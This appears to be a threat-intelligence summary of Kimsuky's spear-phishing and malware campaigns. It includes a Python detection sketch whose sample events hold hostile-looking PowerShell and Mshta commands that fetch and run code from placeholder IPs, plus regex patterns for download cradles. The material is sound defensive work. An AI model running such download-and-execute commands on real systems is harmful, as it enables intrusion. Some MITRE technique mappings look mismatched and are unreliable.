This article discusses the Kimsuky group's continued cyber attacks, highlighting their use of various malware types, including the PebbleDash backdoor and a custom RDP Wrapper. The group uses refined tactics such as spear-phishing with malicious shortcut files, proxy tools for external access, keyloggers, and information-stealing malware to compromise systems. These methods show an evolution from traditional backdoors to more sophisticated remote-control tools. Affected: Kimsuky group, Windows operating systems, Korean users
Key points:
- Kimsuky group conducts spear-phishing attacks using malicious shortcut files disguised as document files.
- Once executed, these files initiate PowerShell or Mshta to download additional malware.
- PebbleDash backdoor and custom RDP Wrapper are used to control infected systems.
- RDP Wrapper bypasses limitations of remote desktop functionality in certain Windows versions.
- Proxy malware is employed to facilitate external access to systems within private networks.
- Keyloggers are utilized to capture user keystrokes and store them in various locations.
- New infostealer malware extracts key values from web browsers instead of stealing credentials directly.
- Increased usage of Loader and Injector malware indicates a shift in attack methodologies.
- Preventative measures include verifying email senders and updating security software regularly.
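The shortcut-to-downloader chain in the first two key points (a double-clicked .lnk launching PowerShell or Mshta to fetch the next stage) leaves a recognisable parent/child trace in process-creation telemetry. The following detection sketch is an added example, not code from the ASEC report; it runs over constructed Sysmon-style events and assumes explorer.exe as the parent of a user-launched shortcut.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# They are illustrative only and use documentation IP ranges, not indicators from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/a.txt\')"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://203.0.113.9/report.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Scripts\deploy.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe invoice.txt"},
]

# Interpreters a shortcut file can launch directly, and the shell parent assumed
# for a user double-clicking a .lnk (an assumption of this example).
LOLBIN_TARGETS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
SHELL_PARENTS = {"explorer.exe"}

# Command-line traits that point at a download stage rather than routine scripting.
DOWNLOAD_PATTERNS = [
    re.compile(r"https?://", re.I),
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
]


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_lnk_download_chain(event):
    """True when a shell-spawned PowerShell/Mshta process carries download indicators."""
    if basename(event["Image"]) not in LOLBIN_TARGETS:
        return False
    if basename(event["ParentImage"]) not in SHELL_PARENTS:
        return False
    return any(p.search(event["CommandLine"]) for p in DOWNLOAD_PATTERNS)


def find_suspicious(events):
    """Return the subset of events that match the shortcut-to-downloader pattern."""
    return [e for e in events if is_lnk_download_chain(e)]


if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", e["CommandLine"])
```

The deploy.exe-spawned PowerShell and the notepad launch are deliberately included as benign cases so the rule's parent and command-line conditions can be seen filtering them out.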
MITRE Techniques:
- Execution (T1203): Utilizing malicious LNK files to execute PowerShell scripts for further malware download.
- Persistence (T1547.001): Using RDP Wrapper to maintain access to the infected system remotely.
- Credential Access (T1056): Leveraging keyloggers to collect user credentials.
- Exfiltration (T1041): Employing proxy malware to facilitate exfiltration of information from the compromised system.
- Discovery (T1018): Gathering information on specific targets through spear-phishing emails.
Indicators of Compromise:
Full Story: https://asec.ahnlab.com/en/86098/